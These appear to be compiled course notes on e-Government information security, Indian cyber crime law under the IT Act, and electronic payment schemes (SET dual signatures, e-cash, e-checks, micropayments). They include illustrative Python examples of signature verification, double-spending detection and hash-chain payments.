The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of those services.

2. INFORMATION SECURITY. A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;

• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

• monitoring and reviewing the performance and effectiveness of the ISMS;

• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

• Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

• Confidentiality: the capability to prevent unauthorized access to information.

• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

• Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

• Non-repudiation: the capability to prevent a person or system involved in an event or action from denying or challenging their participation in that event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• protecting premises, equipment and system software, including input-output units;

• protecting software applications used to process personal data;

• preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks;

• ensuring effective methods of blocking, destruction, erasure or anonymization of personal data;

• enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Despite this, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS. Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks include techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

• continually improve its control environment;

• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government websites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

• 121 million Internet users

• 65 million active Internet users, up by 28% from 51 million in 2010

• 50 million users shop online on e-commerce and online shopping sites

• 46+ million social network users

• 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;

• downloads, copies or extracts any data, computer database or any information;

• introduces or causes to be introduced any virus or contaminant;

• disrupts or causes disruption;

• denies or causes denial of access to any person;

• provides any assistance to any person to facilitate access;

• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43 –

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both" [S66].

S 66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or

• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A – Punishment for publishing or transmitting material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C – Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years and/or fine up to 2 lakh rupees.

Section 66 – Hacking. Punishment: imprisonment up to three years and/or fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States, or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Dual signature generation and verification –

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– cardholder authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or PI is changed, the dual signature will no longer be valid.
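The three verification steps above, worked end to end as an added example (not part of the original slides): the cardholder builds DS over H[ H[PI] || H[OI] ] with a toy RSA key, the merchant then checks it from OI and H[PI], and the payment gateway from PI and H[OI]. The RSA key, the sample OI and PI, and SHA-256 as the hash function are assumptions made for this example.

```python
import hashlib

# Toy RSA signing key built from two known primes (2^61-1 and 2^89-1).
# Constructed for this example only: a ~150-bit modulus is far too small
# for real use, but it keeps the arithmetic self-contained and offline.
P = (1 << 61) - 1
Q = (1 << 89) - 1
N = P * Q
E = 65537                              # public exponent: key_public_sign,cardholder
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent, held by the cardholder only


def H(data: bytes) -> bytes:
    """Message digest; SHA-256 stands in for the hash the slides call H[]."""
    return hashlib.sha256(data).digest()


def digest_to_int(h: bytes) -> int:
    # The toy modulus is only ~150 bits, so the value actually signed is the
    # leading 128 bits of the digest (textbook RSA needs the message < N).
    return int.from_bytes(h[:16], "big")


def dual_sign(oi: bytes, pi: bytes) -> int:
    """Cardholder: DS = RSA-sign( H[ H[PI] || H[OI] ] ) with the private key."""
    pomd = H(H(pi) + H(oi))
    return pow(digest_to_int(pomd), D, N)


def cardholder_messages(oi: bytes, pi: bytes):
    """Split what each party receives: merchant gets OI, H[PI], DS;
    payment gateway gets PI, H[OI], DS. Neither sees the other's plaintext."""
    ds = dual_sign(oi, pi)
    to_merchant = {"OI": oi, "H_PI": H(pi), "DS": ds}
    to_gateway = {"PI": pi, "H_OI": H(oi), "DS": ds}
    return to_merchant, to_gateway


def rsa_open(ds: int) -> int:
    """Step 2: D_RSA[ DS | key_public_sign,cardholder ], recovering the signed digest."""
    return pow(ds, E, N)


def merchant_verifies(msg: dict) -> bool:
    """Steps 1 and 3: recompute H[ H[PI] || H[OI] ] from the received H[PI]
    and the merchant's own copy of OI, then compare with the opened signature."""
    expected = digest_to_int(H(msg["H_PI"] + H(msg["OI"])))
    return rsa_open(msg["DS"]) == expected


def gateway_verifies(msg: dict) -> bool:
    """Same check from the gateway's side, using PI and the received H[OI]."""
    expected = digest_to_int(H(H(msg["PI"]) + msg["H_OI"]))
    return rsa_open(msg["DS"]) == expected


def demo():
    # Constructed sample order information and payment instructions.
    oi = b"order=42;item=textbook;amount=1250.00"
    pi = b"card=0000000000000000;exp=12/30;amount=1250.00"   # placeholder card data
    to_merchant, to_gateway = cardholder_messages(oi, pi)
    ok_merchant = merchant_verifies(to_merchant)
    ok_gateway = gateway_verifies(to_gateway)
    # Anyone altering the order amount in transit breaks the link between OI and PI.
    tampered = dict(to_merchant, OI=b"order=42;item=textbook;amount=12.50")
    ok_tampered = merchant_verifies(tampered)
    return ok_merchant, ok_gateway, ok_tampered


if __name__ == "__main__":
    print(demo())   # → (True, True, False)
```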

DIGITAL ENVELOPE –


SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant to initialize the payment. Then the merchant returns a response message to the cardholder.

• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

• Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers

• Customers

• Merchants or traders

• Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

• Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

• Purchase: Customers purchase certain goods or services and give the merchants tokens which represent the equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

• Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.


This is a simple model of the E-cash payment system; it gives an idea of how the e-cash payment system works. The model is explained in the upcoming slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment to the trader.


In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after receiving the payment for the respective services, the trader provides the requisite service or product and also notifies the customer that the payment made by the customer into the trader's account has been approved.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another. Like the serial numbers on real currency notes, the E-cash numbers are unique. It is issued by a bank and represents a specified sum of real money.


It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.

• Anonymity is preserved unless double spending is attempted.

• Serial numbers can allow tracing to prevent money laundering.
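An added example (not from the original slides) of the three-phase token model and the serial-number checks described above: the issuer mints tokens with unique serial numbers, authenticates them when the merchant redeems them, rejects a serial that is presented a second time, and can trace where a serial was redeemed. The HMAC-based token format, the issuer key and the merchant names are assumptions for this example; the blind-signature anonymity of real e-cash is not modelled here.

```python
import hashlib
import hmac
import secrets

# Issuer's token-authentication key; constructed for this example (a real
# issuer would keep its key in an HSM and use signatures rather than a MAC).
ISSUER_KEY = b"example-issuer-key-constructed-for-demo"


def _tag(key: bytes, serial: str, value: int) -> str:
    """MAC over (serial, value), so a token can be neither forged nor revalued."""
    return hmac.new(key, f"{serial}:{value}".encode(), hashlib.sha256).hexdigest()


class Issuer:
    """The bank of the model: mints tokens, later authenticates and redeems them."""

    def __init__(self, key: bytes = ISSUER_KEY):
        self.key = key
        self.spent = {}            # serial -> merchant that redeemed it (tracing)
        self.merchant_funds = {}   # merchant -> electronic funds credited so far

    def mint(self, value: int) -> dict:
        """Phase 1: the customer withdraws; a token with a unique serial is issued."""
        serial = secrets.token_hex(8)
        return {"serial": serial, "value": value, "tag": _tag(self.key, serial, value)}

    def _authentic(self, token: dict) -> bool:
        expected = _tag(self.key, token["serial"], token["value"])
        return hmac.compare_digest(expected, token["tag"])

    def redeem(self, merchant: str, token: dict) -> str:
        """Phase 3: the merchant presents the token; the issuer authenticates it,
        refuses a serial that was already spent, and credits the merchant."""
        if not self._authentic(token):
            return "rejected: token forged or altered"
        if token["serial"] in self.spent:
            first = self.spent[token["serial"]]
            return f"rejected: double spending, serial already redeemed by {first}"
        self.spent[token["serial"]] = merchant
        self.merchant_funds[merchant] = self.merchant_funds.get(merchant, 0) + token["value"]
        return "approved"

    def trace(self, serial: str):
        """Serial numbers let the issuer see where a given token ended up."""
        return self.spent.get(serial)


def demo():
    issuer = Issuer()
    token = issuer.mint(100)                    # phase 1: withdrawal of a 100-unit token
    first = issuer.redeem("shop-A", token)      # phases 2-3: spent at shop-A, which redeems it
    second = issuer.redeem("shop-B", token)     # the same token spent again at shop-B
    altered = dict(token, value=500)            # a merchant trying to inflate the value
    third = issuer.redeem("shop-A", altered)
    return first, second.startswith("rejected: double spending"), third, issuer.merchant_funds


if __name__ == "__main__":
    print(demo())   # → ('approved', True, 'rejected: token forged or altered', {'shop-A': 100})
```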

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because no credential such as a card password is involved; it is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on a secure HTTPS protocol, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.

• Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.

• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges, so very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system may be, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

• While making the payment it is very important that the internet connection and power supply remain active. If the payment is in process and the internet connection fails in between, it can lead to loss of information, i.e. the amount is charged but does not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

• E-Cash is not for everyone. Low income segments without computer and internet access are unable to use E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more complete. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and to enter the bank routing number (ABA) and account number.
2. The merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System –

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based), PayWord (post-payment).

MICRO PAYMENT IS -

Very small payments made over the Web
Transactions too small for credit cards
Can be as little as a fraction of a cent
Alternative to subscription and advertising
Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
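The aggregation scheme just described, combined with the hash-chain idea behind PayWord (named above as a post-payment method), as an added example that is not part of the original notes or of any PayWord implementation. The PayerWallet, Seller and ServiceProvider classes, the seed value and the one-cent unit price are assumptions made for the demo; the point shown is that the seller can verify every tiny payment offline and settle many of them with the provider in one go.

```python
import hashlib


def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


class PayerWallet:
    """Customer side. Builds a hash chain w_n -> w_0 once; each payment reveals
    the next link. Only the holder of the seed can produce further links."""

    def __init__(self, seed: bytes, chain_length: int):
        chain = [seed]
        for _ in range(chain_length):
            chain.append(h(chain[-1]))
        self.words = chain[::-1]   # words[0] = root (commitment), words[n] = seed
        self.spent = 0

    def root(self) -> bytes:
        return self.words[0]

    def pay(self, units: int):
        """Spend `units` more; returns (payword, index) for the seller."""
        if units <= 0 or self.spent + units >= len(self.words):
            raise ValueError("chain exhausted; wallet must issue a new commitment")
        self.spent += units
        return self.words[self.spent], self.spent


class Seller:
    """Seller side. Verifies each payword offline by hashing forward to the
    last accepted word, so no call to the provider is needed per click."""

    def __init__(self, root: bytes):
        self.last_word, self.last_index = root, 0

    def accept(self, word: bytes, index: int) -> bool:
        if index <= self.last_index:
            return False            # replayed or stale payword
        probe = word
        for _ in range(index - self.last_index):
            probe = h(probe)
        if probe != self.last_word:
            return False            # does not chain back to the commitment
        self.last_word, self.last_index = word, index
        return True

    def claim(self):
        """What the seller hands to the provider at settlement time."""
        return self.last_word, self.last_index


class ServiceProvider:
    """Third party that holds each payer's commitment, settles a seller's
    accumulated claim in one payment and charges the payer once."""

    def __init__(self, unit_price_cents: int):
        self.roots = {}             # payer id -> committed root
        self.unit_price_cents = unit_price_cents

    def register(self, payer_id: str, root: bytes):
        self.roots[payer_id] = root

    def settle(self, payer_id: str, word: bytes, index: int) -> int:
        """Cents owed to the seller if the claim is valid, otherwise 0."""
        probe = word
        for _ in range(index):
            probe = h(probe)
        if probe != self.roots.get(payer_id):
            return 0
        return index * self.unit_price_cents


def demo():
    seed = b"constructed-secret-seed-for-demo"    # sample value, not a real key
    wallet = PayerWallet(seed, chain_length=100)
    provider = ServiceProvider(unit_price_cents=1)
    provider.register("alice", wallet.root())
    seller = Seller(wallet.root())

    results = []
    w1, i1 = wallet.pay(1)                          # one article for one cent
    results.append(seller.accept(w1, i1))           # True
    results.append(seller.accept(w1, i1))           # False: replay of same word
    results.append(seller.accept(b"\x00" * 32, i1 + 1))  # False: not on the chain
    w4, i4 = wallet.pay(3)                          # three more units at once
    results.append(seller.accept(w4, i4))           # True: hashes back to w1
    owed = provider.settle("alice", *seller.claim())  # one settlement: 4 cents
    return results, owed


if __name__ == "__main__":
    print(demo())
```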

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

